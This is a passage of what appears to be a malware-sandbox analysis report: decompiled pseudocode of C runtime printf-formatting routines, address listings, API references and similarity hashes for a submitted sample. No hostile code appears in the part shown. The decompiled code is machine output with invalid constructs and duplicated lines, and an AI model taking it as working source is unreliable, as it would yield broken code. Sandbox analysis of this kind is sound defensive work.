																					 *( *(__ebp - 0x484)) = __ax;
																				}
																				 *(__ebp - 0x28) = 1;
																				goto L187;
																			}
																			L107:
																			__ecx = 0;
																			if(0 == 0) {
																				 *(__ebp - 0x4f4) = 0;
																			} else {
																				 *(__ebp - 0x4f4) = 1;
																			}
																			__edx =  *(__ebp - 0x4f4);
																			 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
																			if( *(__ebp - 0x488) == 0) {
																				_push(L"(\"\'n\' format specifier disabled\", 0)");
																				_push(0);
																				_push(0x695);
																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																				_push(2);
																				__eax = L0040C820();
																				__esp = __esp + 0x14;
																				if(__eax == 1) {
																					asm("int3");
																				}
																			}
																			if( *(__ebp - 0x488) != 0) {
																				L115:
																				goto L187;
																			} else {
																				L114:
																				 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
																				__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
																				 *(__ebp - 0x4cc) = 0xffffffff;
																				__ecx = __ebp - 0x40;
																				__eax = E00410370(__ecx);
																				__eax =  *(__ebp - 0x4cc);
																				goto L225;
																			}
																		case 9:
																			L148:
																			 *(__ebp - 8) = 8;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
																			}
																			goto L150;
																		case 0xa:
																			L142:
																			 *(__ebp - 0x30) = 8;
																			goto L143;
																		case 0xb:
																			L84:
																			if( *(__ebp - 0x30) != 0xffffffff) {
																				__edx =  *(__ebp - 0x30);
																				 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
																			} else {
																				 *(__ebp - 0x4f0) = 0x7fffffff;
																			}
																			__eax =  *(__ebp - 0x4f0);
																			 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
																			__ecx = __ebp + 0x14;
																			 *(__ebp - 4) = E0041F270(__ebp + 0x14);
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																				L98:
																				if( *(__ebp - 4) == 0) {
																					__ecx =  *0x4bc064; // 0x408104
																					 *(__ebp - 4) = __ecx;
																				}
																				 *(__ebp - 0xc) = 1;
																				__edx =  *(__ebp - 4);
																				 *(__ebp - 0x480) =  *(__ebp - 4);
																				while(1) {
																					L101:
																					__eax =  *(__ebp - 0x47c);
																					__ecx =  *(__ebp - 0x47c);
																					__ecx =  *(__ebp - 0x47c) - 1;
																					 *(__ebp - 0x47c) = __ecx;
																					if( *(__ebp - 0x47c) == 0) {
																						break;
																					}
																					L102:
																					__edx =  *(__ebp - 0x480);
																					__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
																					if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
																						break;
																					}
																					L103:
																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
																				}
																				L104:
																				 *(__ebp - 0x480) =  *(__ebp - 0x480) -  *(__ebp - 4);
																				__edx =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
																				 *(__ebp - 0x24) =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
																				goto L105;
																			} else {
																				L88:
																				if( *(__ebp - 4) == 0) {
																					__eax =  *0x4bc060; // 0x408114
																					 *(__ebp - 4) = __eax;
																				}
																				__ecx =  *(__ebp - 4);
																				 *(__ebp - 0x478) = __ecx;
																				 *(__ebp - 0x24) = 0;
																				while(1) {
																					L92:
																					__eax =  *(__ebp - 0x24);
																					if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
																						break;
																					}
																					L93:
																					__ecx =  *(__ebp - 0x478);
																					__edx =  *__ecx;
																					if( *__ecx == 0) {
																						break;
																					}
																					L94:
																					__ecx = __ebp - 0x40;
																					E004103A0(__ebp - 0x40) =  *(__ebp - 0x478);
																					__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
																					if(E00420DA0( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478)) != 0) {
																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																					}
																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
																				}
																				L97:
																				L105:
																				goto L187;
																			}
																		case 0xc:
																			goto L0;
																		case 0xd:
																			L144:
																			 *((intOrPtr*)(__ebp - 0x460)) = 0x27;
																			L145:
																			 *(__ebp - 8) = 0x10;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				__edx = 0x30;
																				 *((short*)(__ebp - 0x14)) = __dx;
																				 *((intOrPtr*)(__ebp - 0x460)) =  *((intOrPtr*)(__ebp - 0x460)) + 0x51;
																				 *(__ebp - 0x12) = __ax;
																				 *(__ebp - 0x1c) = 2;
																			}
																			goto L150;
																		case 0xe:
																			goto L187;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0042384d
0x0042384d
0x0042384d
0x0042384d
0x0042384d
0x00000000
0x004238c2
0x00000000
0x004238c2
0x00000000
0x004238c2
0x004238c2
0x004238ca
0x004238ec
0x004238f2
0x00423917
0x0042395e
0x00423961
0x00423982
0x00423987
0x0042398c
0x00423992
0x00423963
0x00423967
0x0042396c
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391f
0x00423941
0x00423946
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423925
0x0042392a
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f8
0x004238fd
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238d0
0x004238d5
0x004238d8
0x004238de
0x004238de
0x0042399e
0x004239e0
0x004239e6
0x004239f2
0x00000000
0x004239a0
0x004239a0
0x004239a0
0x004239a7
0x00000000
0x004239b4
0x004239b4
0x004239c2
0x004239c7
0x004239cd
0x004239db
0x004239f8
0x00423a00
0x00423a22
0x00423a22
0x00423a2c
0x00423a3d
0x00423a47
0x00423a49
0x00423a49
0x00423a2e
0x00423a2e
0x00423a2e
0x00423a5c
0x00423a5e
0x00423a5e
0x00423a6b
0x00423a6e
0x00423a6e
0x00423a74
0x00423a77
0x00423a7c
0x00000000
0x00000000
0x00423a8c
0x00423a8f
0x00423a99
0x00423aa8
0x00423ab1
0x00423ac7
0x00423acd
0x00423ada
0x00423ae8
0x00423ae8
0x00423af7
0x00423aff
0x00423aff
0x00423b07
0x00423b10
0x00423b19
0x00423b25
0x00423b3e
0x00423b44
0x00423b4d
0x00423b4d
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00423d30
0x00423d34
0x00423d3c
0x00423d41
0x00423d44
0x00423d44
0x00423d4b
0x00423d4b
0x00422ecb
0x00422ed2
0x00422edf
0x00422ee4
0x00000000
0x00422ef7
0x00422f01
0x00422f28
0x00422f0f
0x00422f20
0x00422f20
0x00422f01
0x00422f32
0x00422f38
0x00422f44
0x00422f47
0x00422f55
0x00422f58
0x00422f65
0x0042300a
0x00423010
0x0042301d
0x00000000
0x00000000
0x00423023
0x00423029
0x00000000
0x00423030
0x00423030
0x0042304a
0x0042304f
0x00000000
0x00000000
0x00423057
0x00423057
0x0042305e
0x00423061
0x00423064
0x00423067
0x0042306a
0x0042306d
0x00423070
0x00423077
0x0042307e
0x00000000
0x00000000
0x0042308a
0x0042308a
0x00423091
0x0042309d
0x004230a0
0x004230ad
0x00000000
0x00000000
0x004230af
0x004230b5
0x004230b5
0x004230bc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423100
0x00423100
0x0042310a
0x00423137
0x00423141
0x00423141
0x00423145
0x0042310c
0x0042310c
0x00423118
0x0042311f
0x00423124
0x00423127
0x0042312a
0x0042312d
0x0042312f
0x0042312f
0x00423132
0x00000000
0x00000000
0x0042314d
0x0042314d
0x00000000
0x00000000
0x00423159
0x00423159
0x00423163
0x00423183
0x00423186
0x00423190
0x00423190
0x00423194
0x00423165
0x00423165
0x00423171
0x00423178
0x0042317a
0x0042317a
0x00423181
0x00000000
0x00000000
0x0042319c
0x0042319c
0x004231a3
0x004231af
0x004231b2
0x004231bf
0x004232d2
0x00000000
0x004232d2
0x004231c5
0x004231cb
0x004231cb
0x004231d2
0x00000000
0x00423209
0x00423209
0x0042320c
0x00423212
0x00423239
0x00423239
0x0042323c
0x00423242
0x00423266
0x00423266
0x00423269
0x0042326f
0x004232a8
0x004232b9
0x00000000
0x004232b9
0x00423271
0x00423271
0x00423274
0x0042327a
0x00000000
0x00000000
0x0042327c
0x0042327c
0x0042327f
0x00423285
0x00000000
0x00000000
0x00423287
0x00423287
0x0042328a
0x00423290
0x00000000
0x00000000
0x00423292
0x00423292
0x00423295
0x0042329b
0x00000000
0x00000000
0x0042329d
0x0042329d
0x004232a0
0x004232a6
0x004232aa
0x00000000
0x004232aa
0x00000000
0x004232a6
0x00423244
0x00423244
0x00423247
0x0042324e
0x00000000
0x00423250
0x00423253
0x00423256
0x0042325c
0x00423261
0x00000000
0x00423261
0x0042324e
0x00423214
0x00423214
0x00423217
0x0042321e
0x00000000
0x00423220
0x00423223
0x00423226
0x0042322c
0x00423231
0x00000000
0x00423231
0x00000000
0x004232bb
0x004232bb
0x004232be
0x004232c1
0x00000000
0x00000000
0x004231d9
0x004231d9
0x004231dc
0x004231e2
0x004231fe
0x00423201
0x004231e4
0x004231e4
0x004231e7
0x004231ea
0x004231f0
0x004231f6
0x004231f6
0x00000000
0x00000000
0x004232c6
0x004232c9
0x004232cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004230d9
0x004230d9
0x004230dc
0x004230df
0x00000000
0x00000000
0x004230e4
0x004230e7
0x004230ed
0x00000000
0x00000000
0x004230ce
0x004230d1
0x004230d4
0x00000000
0x00000000
0x004230c3
0x004230c6
0x004230c9
0x00000000
0x00000000
0x004230f2
0x004230f5
0x004230f8
0x00000000
0x00000000
0x004230fb
0x00000000
0x00000000
0x00422f6b
0x00422f6b
0x00422f6d
0x00422f7b
0x00422f6f
0x00422f6f
0x00422f6f
0x00422f8b
0x00422f98
0x00422f9a
0x00422f9f
0x00422fa1
0x00422fa6
0x00422fab
0x00422fad
0x00422fb2
0x00422fb8
0x00422fba
0x00422fba
0x00422fb8
0x00422fbb
0x00422fc2
0x00000000
0x00422fc4
0x00422fc9
0x00422fe5
0x00422fed
0x00422ffa
0x00422fff
0x00423e14
0x00423e21
0x00423e21
0x00422fc2
0x00422f65
0x00423d50
0x00423d57
0x00423d6e
0x00423d62
0x00423d62
0x00423d62
0x00423d78
0x00423d7e
0x00423d8b
0x00423d8d
0x00423d92
0x00423d94
0x00423d99
0x00423d9e
0x00423da0
0x00423da5
0x00423dab
0x00423dad
0x00423dad
0x00423dab
0x00423db5
0x00423e00
0x00423e09
0x00423e0e
0x00423db7
0x00423dbc
0x00423dd8
0x00423de0
0x00423ded
0x00423df2
0x00423df2
0x00000000
0x00423db5
0x00423b5a
0x00423b60
0x00423b6a
0x00423b84
0x00423b9e
0x00423ba5
0x00423ba9
0x00423ba9
0x00423b86
0x00423b8b
0x00423b8f
0x00423b8f
0x00423b6c
0x00423b71
0x00423b75
0x00423b75
0x00423b6a
0x00423bb9
0x00423bc5
0x00423bdb
0x00423be0
0x00423be0
0x00423bf6
0x00423bfb
0x00423c04
0x00423c22
0x00423c27
0x00423c27
0x00423c2e
0x00423ce8
0x00423cfb
0x00423d00
0x00000000
0x00423c3e
0x00423c3e
0x00423c41
0x00423c4a
0x00423c50
0x00423c50
0x00423c5f
0x00423c67
0x00000000
0x00000000
0x00423c69
0x00423c6c
0x00423c91
0x00423c96
0x00423c99
0x00423ca6
0x00423cb4
0x00423cc7
0x00423ccc
0x00423cdb
0x00000000
0x00423cdb
0x00423ca8
0x00423ca8
0x00000000
0x00423ca8
0x00423ce6
0x00423d03
0x00423d0a
0x00423d28
0x00423d2d
0x00423d2d
0x00000000
0x00423d0a
0x004232d7
0x004232d7
0x004232de
0x004232e4
0x004232ea
0x004232ed
0x004232f3
0x00423300
0x00423306
0x00423306
0x0042330d
0x00000000
0x00423691
0x00423691
0x0042369f
0x004236a2
0x00000000
0x00000000
0x00423314
0x00423317
0x0042331d
0x00423322
0x00423325
0x00423325
0x00000000
0x00000000
0x0042345a
0x0042345d
0x00423462
0x00423467
0x0042346a
0x0042346a
0x00000000
0x00000000
0x0042385d
0x0042385d
0x00000000
0x00000000
0x004233c4
0x004233c4
0x004233d0
0x004233dd
0x004233eb
0x004233eb
0x004233f1
0x004233f4
0x00423400
0x00423455
0x00000000
0x00423455
0x004233df
0x004233df
0x004233e9
0x00423405
0x00423408
0x0042340e
0x00423436
0x0042343d
0x00423443
0x00423446
0x00423449
0x0042344f
0x00423452
0x00423410
0x00423410
0x00423416
0x00423419
0x0042341c
0x00423422
0x00423425
0x00423428
0x0042342a
0x0042342d
0x0042342d
0x00000000
0x0042340e
0x00000000
0x00000000
0x004236a9
0x004236ac
0x004236af
0x004236b2
0x004236b8
0x004236bb
0x004236c6
0x004236d1
0x004236d5
0x004236ec
0x004236f3
0x004236f5
0x004236f5
0x004236fc
0x00423703
0x00423711
0x00423714
0x00423723
0x0042372a
0x0042373f
0x0042372c
0x0042372c
0x0042372f
0x00423735
0x0042373a
0x0042373a
0x0042372a
0x00423749
0x0042374c
0x0042374f
0x00423752
0x00423755
0x00423758
0x0042375e
0x00423764
0x0042376c
0x0042376d
0x00423770
0x00423771
0x00423774
0x00423775
0x0042377c
0x0042377d
0x00423780
0x00423781
0x00423784
0x00423785
0x0042378b
0x0042378c
0x0042379b
0x0042379d
0x004237a3
0x004237a8
0x004237b0
0x004237b8
0x004237b9
0x004237bc
0x004237bd
0x004237cc
0x004237ce
0x004237ce
0x004237d1
0x004237db
0x004237e0
0x004237e6
0x004237e8
0x004237f0
0x004237f1
0x004237f4
0x004237f5
0x00423803
0x00423805
0x00423805
0x004237e6
0x00423808
0x0042380b
0x00423811
0x00423816
0x0042381b
0x00423821
0x00423824
0x00423824
0x00423827
0x00423833
0x00000000
0x00423833
0x004236d7
0x004236d7
0x004236e1
0x00000000
0x00000000
0x004236e3
0x004236e3
0x00000000
0x004236e3
0x004236c8
0x004236c8
0x00000000
0x00000000
0x00423328
0x00423328
0x00423333
0x0042333b
0x00423342
0x00423345
0x00423348
0x004233a8
0x0042334a
0x00423351
0x00423357
0x0042335d
0x00423364
0x00423367
0x0042336d
0x00423375
0x00423377
0x0042337e
0x00423385
0x00423396
0x00423398
0x00423398
0x0042339f
0x004233af
0x004233b5
0x004233b8
0x00000000
0x00000000
0x0042383b
0x0042383e
0x00423841
0x00423844
0x00000000
0x00000000
0x0042359a
0x0042359a
0x004235a6
0x004235b3
0x0042365d
0x0042365d
0x00423660
0x00423663
0x00423677
0x0042367d
0x00423683
0x00423665
0x00423665
0x0042366b
0x00423672
0x00423672
0x00423685
0x00000000
0x00423685
0x004235b9
0x004235b9
0x004235bb
0x004235c9
0x004235bd
0x004235bd
0x004235bd
0x004235d3
0x004235d9
0x004235e6
0x004235e8
0x004235ed
0x004235ef
0x004235f4
0x004235f9
0x004235fb
0x00423600
0x00423606
0x00423608
0x00423608
0x00423606
0x00423610
0x00423658
0x00000000
0x00423612
0x00423612
0x00423617
0x00423633
0x0042363b
0x00423645
0x00423648
0x0042364d
0x00000000
0x0042364d
0x00000000
0x004238a4
0x004238a4
0x004238ae
0x004238b4
0x004238b9
0x004238bf
0x004238bf
0x00000000
0x00000000
0x00423856
0x00423856
0x00000000
0x00000000
0x0042346d
0x00423471
0x0042347f
0x00423482
0x00423473
0x00423473
0x00423473
0x00423488
0x0042348e
0x00423494
0x004234a0
0x004234a6
0x004234a9
0x00423531
0x00423535
0x00423537
0x0042353d
0x0042353d
0x00423540
0x00423547
0x0042354a
0x00423550
0x00423550
0x00423550
0x00423556
0x0042355c
0x0042355f
0x00423567
0x00000000
0x00000000
0x00423569
0x00423569
0x0042356f
0x00423574
0x00000000
0x00000000
0x00423576
0x0042357c
0x0042357f
0x0042357f
0x00423587
0x0042358d
0x00423590
0x00423592
0x00000000
0x004234af
0x004234af
0x004234b3
0x004234b5
0x004234ba
0x004234ba
0x004234bd
0x004234c0
0x004234c6
0x004234d8
0x004234d8
0x004234d8
0x004234e1
0x00000000
0x00000000
0x004234e3
0x004234e3
0x004234e9
0x004234ee
0x00000000
0x00000000
0x004234f0
0x004234f0
0x004234f9
0x004234ff
0x0042350d
0x00423515
0x00423518
0x00423518
0x00423524
0x00423527
0x004234d2
0x004234d5
0x004234d5
0x0042352f
0x00423595
0x00000000
0x00423595
0x00000000
0x00000000
0x00000000
0x00423869
0x00423869
0x00423873
0x00423873
0x0042387d
0x00423883
0x00423885
0x0042388a
0x00423894
0x00423897
0x0042389b
0x0042389b
0x00000000
0x00000000
0x00000000
0x00000000
0x0042330d
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x004239a7
0x0042399e
0x004238c2
0x004238c2
0x004238c2

APIs

_get_int64_arg.LIBCMTD ref: 004238D0
_get_int64_arg.LIBCMTD ref: 004238F8
__aullrem.LIBCMT ref: 00423AA0
__aulldiv.LIBCMT ref: 00423AC2

Strings

9, xrefs: 00423AD3

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 59057100973511ff7fc05aae94442fb9cfd57d923b650f5ccb2147e9f536b735
Instruction ID: 1cbff0e809dad46a2da7427b621edeeb8fb9a3c5d75bc522dab779b2ce4d9d50
Opcode Fuzzy Hash: 59057100973511ff7fc05aae94442fb9cfd57d923b650f5ccb2147e9f536b735
Instruction Fuzzy Hash: 5A4118B1E001299FDF24CF48D981B9EB7B5FB86315F5041EAE188A7201C7785E81CF19

Uniqueness

Uniqueness Score: -1.00%

Function 004224DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004224DB(signed int __edx) {
				signed int _t496;
				signed int _t518;
				void* _t523;
				signed int _t525;
				void* _t545;
				signed int _t563;
				signed int _t580;
				signed short _t581;
				signed int _t584;
				signed int _t587;
				signed int _t588;
				intOrPtr _t589;
				signed int _t609;
				signed int _t645;
				signed int _t647;
				signed int _t649;
				signed int _t656;
				signed int _t696;
				intOrPtr _t697;
				intOrPtr _t698;
				signed int _t699;
				void* _t701;
				void* _t702;
				signed int _t710;

				L0:
				while(1) {
					L0:
					_t645 = __edx;
					 *(_t699 - 8) = 0xa;
					L153:
					while(1) {
						L153:
						while(1) {
							L153:
							while(1) {
								L153:
								if(( *(_t699 - 0x10) & 0x00008000) == 0) {
									_t647 =  *(_t699 - 0x10) & 0x00001000;
									if(_t647 == 0) {
										if(( *(_t699 - 0x10) & 0x00000020) == 0) {
											_t649 =  *(_t699 - 0x10) & 0x00000040;
											if(_t649 == 0) {
												_t496 = E0041F270(_t699 + 0x14);
												_t702 = _t701 + 4;
												 *(_t699 - 0x2b8) = _t496;
												 *(_t699 - 0x2b4) = 0;
											} else {
												_t580 = E0041F270(_t699 + 0x14);
												_t702 = _t701 + 4;
												asm("cdq");
												 *(_t699 - 0x2b8) = _t580;
												 *(_t699 - 0x2b4) = _t649;
											}
										} else {
											_t696 =  *(_t699 - 0x10) & 0x00000040;
											if(_t696 == 0) {
												_t581 = E0041F270(_t699 + 0x14);
												_t702 = _t701 + 4;
												asm("cdq");
												 *(_t699 - 0x2b8) = _t581 & 0x0000ffff;
												 *(_t699 - 0x2b4) = _t696;
											} else {
												_t584 = E0041F270(_t699 + 0x14);
												_t702 = _t701 + 4;
												asm("cdq");
												 *(_t699 - 0x2b8) = _t584;
												 *(_t699 - 0x2b4) = _t696;
											}
										}
									} else {
										_t587 = E0041F290(_t699 + 0x14);
										_t702 = _t701 + 4;
										 *(_t699 - 0x2b8) = _t587;
										 *(_t699 - 0x2b4) = _t647;
									}
								} else {
									_t588 = E0041F290(_t699 + 0x14);
									_t702 = _t701 + 4;
									 *(_t699 - 0x2b8) = _t588;
									 *(_t699 - 0x2b4) = _t645;
								}
								if(( *(_t699 - 0x10) & 0x00000040) == 0) {
									L170:
									 *(_t699 - 0x2c0) =  *(_t699 - 0x2b8);
									 *(_t699 - 0x2bc) =  *(_t699 - 0x2b4);
									goto L171;
								} else {
									L166:
									_t710 =  *(_t699 - 0x2b4);
									if(_t710 > 0 || _t710 >= 0 &&  *(_t699 - 0x2b8) >= 0) {
										goto L170;
									} else {
										L169:
										asm("adc edx, 0x0");
										 *(_t699 - 0x2c0) =  ~( *(_t699 - 0x2b8));
										 *(_t699 - 0x2bc) =  ~( *(_t699 - 0x2b4));
										 *(_t699 - 0x10) =  *(_t699 - 0x10) | 0x00000100;
										L171:
										if(( *(_t699 - 0x10) & 0x00008000) == 0 && ( *(_t699 - 0x10) & 0x00001000) == 0) {
											 *(_t699 - 0x2bc) =  *(_t699 - 0x2bc) & 0x00000000;
										}
										if( *(_t699 - 0x30) >= 0) {
											 *(_t699 - 0x10) =  *(_t699 - 0x10) & 0xfffffff7;
											if( *(_t699 - 0x30) > 0x200) {
												 *(_t699 - 0x30) = 0x200;
											}
										} else {
											 *(_t699 - 0x30) = 1;
										}
										if(( *(_t699 - 0x2c0) |  *(_t699 - 0x2bc)) == 0) {
											 *(_t699 - 0x1c) = 0;
										}
										 *((intOrPtr*)(_t699 - 4)) = _t699 - 0x49;
										while(1) {
											L181:
											_t655 =  *(_t699 - 0x30) - 1;
											 *(_t699 - 0x30) =  *(_t699 - 0x30) - 1;
											if( *(_t699 - 0x30) <= 0 && ( *(_t699 - 0x2c0) |  *(_t699 - 0x2bc)) == 0) {
												break;
											}
											L183:
											asm("cdq");
											_t656 =  *(_t699 - 0x2c0);
											 *((intOrPtr*)(_t699 - 0x2ac)) = E00421720(_t656,  *(_t699 - 0x2bc),  *(_t699 - 8), _t655) + 0x30;
											asm("cdq");
											 *(_t699 - 0x2c0) = E004216B0( *(_t699 - 0x2c0),  *(_t699 - 0x2bc),  *(_t699 - 8), _t656);
											 *(_t699 - 0x2bc) = _t656;
											if( *((intOrPtr*)(_t699 - 0x2ac)) > 0x39) {
												 *((intOrPtr*)(_t699 - 0x2ac)) =  *((intOrPtr*)(_t699 - 0x2ac)) +  *((intOrPtr*)(_t699 - 0x260));
											}
											 *((char*)( *((intOrPtr*)(_t699 - 4)))) =  *((intOrPtr*)(_t699 - 0x2ac));
											 *((intOrPtr*)(_t699 - 4)) =  *((intOrPtr*)(_t699 - 4)) - 1;
										}
										L186:
										 *((intOrPtr*)(_t699 - 0x24)) = _t699 - 0x49 -  *((intOrPtr*)(_t699 - 4));
										 *((intOrPtr*)(_t699 - 4)) =  *((intOrPtr*)(_t699 - 4)) + 1;
										if(( *(_t699 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t699 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t699 - 4)))) != 0x30)) {
											 *((intOrPtr*)(_t699 - 4)) =  *((intOrPtr*)(_t699 - 4)) - 1;
											 *((char*)( *((intOrPtr*)(_t699 - 4)))) = 0x30;
											 *((intOrPtr*)(_t699 - 0x24)) =  *((intOrPtr*)(_t699 - 0x24)) + 1;
										}
										L190:
										while(1) {
											L190:
											while(1) {
												L190:
												while(1) {
													L190:
													while(1) {
														L190:
														while(1) {
															L190:
															while(1) {
																L190:
																while(1) {
																	do {
																		L190:
																		if( *((intOrPtr*)(_t699 - 0x28)) != 0) {
																			L216:
																			if( *(_t699 - 0x20) != 0) {
																				L0040F230( *(_t699 - 0x20), 2);
																				_t702 = _t702 + 8;
																				 *(_t699 - 0x20) = 0;
																			}
																			while(1) {
																				L218:
																				 *(_t699 - 0x251) =  *( *(_t699 + 0xc));
																				_t663 =  *(_t699 - 0x251);
																				 *(_t699 + 0xc) =  *(_t699 + 0xc) + 1;
																				if( *(_t699 - 0x251) == 0 ||  *(_t699 - 0x24c) < 0) {
																					break;
																				} else {
																					if( *(_t699 - 0x251) < 0x20 ||  *(_t699 - 0x251) > 0x78) {
																						 *(_t699 - 0x310) = 0;
																					} else {
																						 *(_t699 - 0x310) =  *( *(_t699 - 0x251) + L"h != _T(\'\\0\'))") & 0xf;
																					}
																				}
																				L7:
																				 *(_t699 - 0x250) =  *(_t699 - 0x310);
																				_t525 =  *(_t699 - 0x250) * 9;
																				_t609 =  *(_t699 - 0x25c);
																				_t663 = ( *(_t525 + _t609 + 0x4081a0) & 0x000000ff) >> 4;
																				 *(_t699 - 0x25c) = ( *(_t525 + _t609 + 0x4081a0) & 0x000000ff) >> 4;
																				if( *(_t699 - 0x25c) != 8) {
																					L16:
																					 *(_t699 - 0x318) =  *(_t699 - 0x25c);
																					if( *(_t699 - 0x318) > 7) {
																						continue;
																					}
																					L17:
																					switch( *((intOrPtr*)( *(_t699 - 0x318) * 4 +  &M00422AB0))) {
																						case 0:
																							L18:
																							 *(_t699 - 0xc) = 0;
																							_t528 = E00420DA0( *(_t699 - 0x251) & 0x000000ff, E004103A0(_t699 - 0x40));
																							_t705 = _t702 + 8;
																							if(_t528 == 0) {
																								L24:
																								E00422BC0( *(_t699 - 0x251) & 0x000000ff,  *(_t699 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
																								_t702 = _t705 + 0xc;
																								goto L218;
																							} else {
																								E00422BC0( *((intOrPtr*)(_t699 + 8)),  *(_t699 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
																								_t705 = _t705 + 0xc;
																								_t614 =  *( *(_t699 + 0xc));
																								 *(_t699 - 0x251) =  *( *(_t699 + 0xc));
																								_t663 =  *(_t699 + 0xc) + 1;
																								 *(_t699 + 0xc) = _t663;
																								asm("sbb eax, eax");
																								 *(_t699 - 0x27c) =  ~( ~( *(_t699 - 0x251)));
																								if(_t663 == 0) {
																									_push(L"(ch != _T(\'\\0\'))");
																									_push(0);
																									_push(0x486);
																									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																									_push(2);
																									_t540 = L0040C820();
																									_t705 = _t705 + 0x14;
																									if(_t540 == 1) {
																										asm("int3");
																									}
																								}
																								L22:
																								if( *(_t699 - 0x27c) != 0) {
																									goto L24;
																								} else {
																									 *((intOrPtr*)(L00411810(_t614))) = 0x16;
																									E0040C660(_t589, _t614, _t697, _t698, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
																									 *(_t699 - 0x2f4) = 0xffffffff;
																									E00410370(_t699 - 0x40);
																									_t518 =  *(_t699 - 0x2f4);
																									goto L229;
																								}
																							}
																						case 1:
																							L25:
																							 *(__ebp - 0x2c) = 0;
																							__edx =  *(__ebp - 0x2c);
																							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
																							__eax =  *(__ebp - 0x28);
																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
																							__ecx =  *(__ebp - 0x18);
																							 *(__ebp - 0x1c) = __ecx;
																							 *(__ebp - 0x10) = 0;
																							 *(__ebp - 0x30) = 0xffffffff;
																							 *(__ebp - 0xc) = 0;
																							goto L218;
																						case 2:
																							L26:
																							__edx =  *((char*)(__ebp - 0x251));
																							 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
																							if( *(__ebp - 0x31c) > 0x10) {
																								goto L33;
																							}
																							L27:
																							__ecx =  *(__ebp - 0x31c);
																							_t72 = __ecx + 0x422ae8; // 0x498d04
																							__edx =  *_t72 & 0x000000ff;
																							switch( *((intOrPtr*)(( *_t72 & 0x000000ff) * 4 +  &M00422AD0))) {
																								case 0:
																									goto L30;
																								case 1:
																									goto L31;
																								case 2:
																									goto L29;
																								case 3:
																									goto L28;
																								case 4:
																									goto L32;
																								case 5:
																									goto L33;
																							}
																						case 3:
																							L34:
